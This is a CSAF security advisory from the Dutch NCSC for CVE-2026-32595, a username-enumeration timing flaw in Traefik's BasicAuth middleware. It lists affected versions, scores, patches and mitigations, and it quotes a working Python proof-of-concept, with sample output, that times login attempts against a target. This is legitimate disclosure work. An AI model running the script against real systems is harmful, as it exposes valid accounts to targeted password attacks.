{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-32595",
        "tracking": {
            "current_release_date": "2026-03-25T18:21:34.926242Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-32595",
            "initial_release_date": "2026-03-20T18:29:15.684265Z",
            "revision_history": [
                {
                    "date": "2026-03-20T18:29:15.684265Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (3).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:29:18.812048Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-20T18:29:37.073011Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-20T18:29:38.937052Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T18:35:34.818458Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-20T21:07:26.548817Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T22:00:13.398896Z",
                    "number": "7",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-21T01:08:12.858079Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)."
                },
                {
                    "date": "2026-03-21T01:08:26.887343Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-23T12:29:51.911909Z",
                    "number": "10",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| Product Identifiers created (1).| Product Remediations created (2).| References created (6).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-23T12:29:55.207255Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T20:56:47.947018Z",
                    "number": "12",
                    "summary": "CVSS created.| Products connected (3).| Product Identifiers created (3)."
                },
                {
                    "date": "2026-03-24T20:57:12.992215Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:13:13.028911Z",
                    "number": "14",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (4).| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T18:13:14.719239Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T18:13:38.273111Z",
                    "number": "16",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (5)."
                }
            ],
            "status": "interim",
            "version": "16"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441150",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_devspaces:3:"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift Dev Spaces"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2485335"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "traefik-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift Dev Spaces"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/3.7.0-ea1",
                                "product": {
                                    "name": "vers:unknown/3.7.0-ea1",
                                    "product_id": "CSAFPID-5902893",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.11.41",
                                "product": {
                                    "name": "vers:unknown/<2.11.41",
                                    "product_id": "CSAFPID-5874588",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<2.11.41",
                                "product": {
                                    "name": "vers:unknown/>=0|<2.11.41",
                                    "product_id": "CSAFPID-5907231"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<3.6.11",
                                "product": {
                                    "name": "vers:unknown/>=0|<3.6.11",
                                    "product_id": "CSAFPID-5907230"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=1.7.34",
                                "product": {
                                    "name": "vers:unknown/>=0|<=1.7.34",
                                    "product_id": "CSAFPID-5241306"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.0.0-beta1|<3.6.11",
                                "product": {
                                    "name": "vers:unknown/>=3.0.0-beta1|<3.6.11",
                                    "product_id": "CSAFPID-5874589"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.0.0|<=3.6.11",
                                "product": {
                                    "name": "vers:unknown/>=3.0.0|<=3.6.11",
                                    "product_id": "CSAFPID-5902892",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2",
                                "product": {
                                    "name": "vers:unknown/>=3.7.0-ea.1|<3.7.0-ea.2",
                                    "product_id": "CSAFPID-5874590"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Traefik"
                    }
                ],
                "category": "vendor",
                "name": "Traefik"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-32595",
            "cwe": {
                "id": "CWE-208",
                "name": "Observable Timing Discrepancy"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 contain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32595.json"
                },
                {
                    "category": "description",
                    "text": "Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 contain BasicAuth middleware that allows username enumeration via a timing attack. When a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32595"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThere is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\nA timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. 
When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design\n- User doesn't exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n  name: basicauth\n  namespace: traefik-poc\nspec:\n  basicAuth:\n    secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n  name: test-basicauth\n  annotations:\n    traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n  ingressClassName: traefik\n  rules:\n    - http:\n        paths:\n          - path: /protected\n            pathType: Prefix\n            backend:\n              service:\n                name: whoami\n                port:\n                  number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n    times = []\n    for _ in range(SAMPLES):\n        start = time.perf_counter()\n        requests.get(TARGET, auth=(username, password), timeout=5)\n        elapsed = time.perf_counter() - start\n        times.append(elapsed)\n    return statistics.median(times)\nprint(f\"Target: 
{TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n    median = measure_time(user)\n    if median > 0.05:  # bcrypt threshold\n        status = \"[+] EXISTS (slow - bcrypt verification)\"\n    else:\n        status = \"[-] NOT FOUND (fast - immediate return)\"\n    print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin         | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent   | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n  - Attackers can enumerate valid usernames without authentication\n  - Enables targeted password brute-force attacks against confirmed accounts\n  - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires:\n  - BasicAuth middleware enabled\n  - Attacker able to make requests to protected endpoints\n  - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n</details>\n\n---",
                    "title": "github - https://api.github.com/advisories/GHSA-g3hg-j4jv-cwfr"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Traefik. An unauthenticated attacker can exploit a timing attack vulnerability in the BasicAuth middleware. By observing the time it takes for the middleware to respond, an attacker can determine if a submitted username is valid or not. This information disclosure allows for username enumeration.\nMODERATE. The vulnerability in Traefik's BasicAuth middleware allows an unauthenticated attacker to perform username enumeration through a timing attack. By observing response times, an attacker can distinguish valid usernames from invalid ones. This information disclosure could aid in further targeted attacks against Red Hat OpenShift Dev Spaces deployments utilizing Traefik with BasicAuth.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32595.json"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThere is a potential vulnerability in Traefik's BasicAuth middleware that allows username enumeration via a timing attack.\n\nWhen a submitted username exists, the middleware performs a bcrypt password comparison taking ~166ms. When the username does not exist, the response returns immediately in ~0.6ms. This ~298x timing difference is observable over the network and allows an unauthenticated attacker to reliably distinguish valid from invalid usernames.\n\n## Patches\n\n- https://github.com/traefik/traefik/releases/tag/v2.11.41\n- https://github.com/traefik/traefik/releases/tag/v3.6.11\n- https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2\n\n## For more information\n\nIf you have any questions or comments about this advisory, please [open an issue](https://github.com/traefik/traefik/issues).\n\n<details>\n<summary>Original Description</summary>\n\n### Summary\nA timing attack vulnerability exists in Traefik's BasicAuth middleware that allows unauthenticated attackers to enumerate valid usernames. When a username exists, bcrypt password verification takes ~166ms; when it doesn't exist, the response returns immediately in ~0.6ms. This ~298x timing difference enables reliable username enumeration.\n\n### Details\nThe vulnerability exists in the BasicAuth middleware implementation. 
When validating credentials:\n- User exists: The system performs bcrypt password comparison, which intentionally takes ~100-200ms due to bcrypt's design\n- User doesn't exist: The system immediately returns authentication failure in ~0.6ms\n\nThis timing difference is observable over the network and allows attackers to distinguish between valid and invalid usernames.\n\nRoot Cause: The code returns early when the user is not found, without performing a dummy bcrypt comparison to maintain constant-time execution.\n\nExpected behavior: The system should perform a bcrypt comparison regardless of whether the user exists, to maintain consistent response times.\n\n### PoC\nEnvironment:\n- Traefik v3.6.9\n- k3s v1.34.5\n\nConfiguration:\n```yaml\napiVersion: traefik.io/v1alpha1\nkind: Middleware\nmetadata:\n  name: basicauth\n  namespace: traefik-poc\nspec:\n  basicAuth:\n    secret: basic-auth-secret\n---\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n  name: test-basicauth\n  annotations:\n    traefik.ingress.kubernetes.io/router.middlewares: traefik-poc-basicauth@kubernetescrd\nspec:\n  ingressClassName: traefik\n  rules:\n    - http:\n        paths:\n          - path: /protected\n            pathType: Prefix\n            backend:\n              service:\n                name: whoami\n                port:\n                  number: 80\n```\n\nPoC Script:\n```python\n#!/usr/bin/env python3\nimport requests\nimport time\nimport statistics\nimport sys\nTARGET = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:30080/protected\"\nTEST_USERS = [\"admin\", \"root\", \"test\", \"nonexistent12345\"]\nSAMPLES = 20\ndef measure_time(username, password=\"wrongpassword\"):\n    times = []\n    for _ in range(SAMPLES):\n        start = time.perf_counter()\n        requests.get(TARGET, auth=(username, password), timeout=5)\n        elapsed = time.perf_counter() - start\n        times.append(elapsed)\n    return statistics.median(times)\nprint(f\"Target: 
{TARGET}\")\nprint(f\"Samples per user: {SAMPLES}\\n\")\nfor user in TEST_USERS:\n    median = measure_time(user)\n    if median > 0.05:  # bcrypt threshold\n        status = \"[+] EXISTS (slow - bcrypt verification)\"\n    else:\n        status = \"[-] NOT FOUND (fast - immediate return)\"\n    print(f\"{status}: {user:20s} | median={median:.4f}s\")\n```\n\nExecution Results:\n```\nTarget: http://10.10.10.7:30080/protected\nSamples per user: 20\n\n[+] EXISTS (slow - bcrypt verification): admin         | median=0.1665s\n[-] NOT FOUND (fast - immediate return): root          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): test          | median=0.0006s\n[-] NOT FOUND (fast - immediate return): nonexistent   | median=0.0006s\n\nTiming difference ratio: 298.0x\n```\n\n### Impact\n- **Vulnerability Type:** Information Disclosure via Timing Attack (CWE-208)\n- **Impact:**\n  - Attackers can enumerate valid usernames without authentication\n  - Enables targeted password brute-force attacks against confirmed accounts\n  - Exposes information about system user structure\n- **Who is impacted:** All users of Traefik's BasicAuth middleware are affected. The vulnerability requires:\n  - BasicAuth middleware enabled\n  - Attacker able to make requests to protected endpoints\n  - Network access to measure response times\n- **Attack Complexity:** Low - only requires sending HTTP requests and measuring response times\n- **Privileges Required:** None\n- **User Interaction:** None\n\n</details>\n\n---",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g3hg-j4jv-cwfr.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Traefik Affected by BasicAuth Middleware Timing Attack Allows Username Enumeration in github.com/traefik/traefik",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4792.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00036",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "6.3",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.5",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to CWE-208 (Observable Timing Discrepancy), The value of the most recent CVSS (V3) score",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 2\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5874588",
                    "CSAFPID-5874589",
                    "CSAFPID-5874590",
                    "CSAFPID-1441150",
                    "CSAFPID-2485335",
                    "CSAFPID-5902892",
                    "CSAFPID-5902893",
                    "CSAFPID-5241306",
                    "CSAFPID-5907230",
                    "CSAFPID-5907231"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32595.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32595"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-g3hg-j4jv-cwfr"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32595.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g3hg-j4jv-cwfr.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4792.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/traefik/traefik/security/advisories/GHSA-g3hg-j4jv-cwfr"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
                    "url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32595"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-g3hg-j4jv-cwfr"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-32595"
                }
            ],
            "remediations": [
                {
                    "category": "mitigation",
                    "details": "To mitigate the risk of username enumeration, restrict network access to the Traefik instance using firewall rules or network policies, allowing connections only from trusted sources. If BasicAuth is not strictly required, consider disabling or removing the BasicAuth middleware configuration.",
                    "product_ids": [
                        "CSAFPID-1441150",
                        "CSAFPID-2485335"
                    ]
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
                        "baseScore": 5.3,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-1441150",
                        "CSAFPID-2485335",
                        "CSAFPID-5241306",
                        "CSAFPID-5874588",
                        "CSAFPID-5874589",
                        "CSAFPID-5874590",
                        "CSAFPID-5902892",
                        "CSAFPID-5902893",
                        "CSAFPID-5907230",
                        "CSAFPID-5907231"
                    ]
                }
            ],
            "title": "CVE-2026-32595"
        }
    ]
}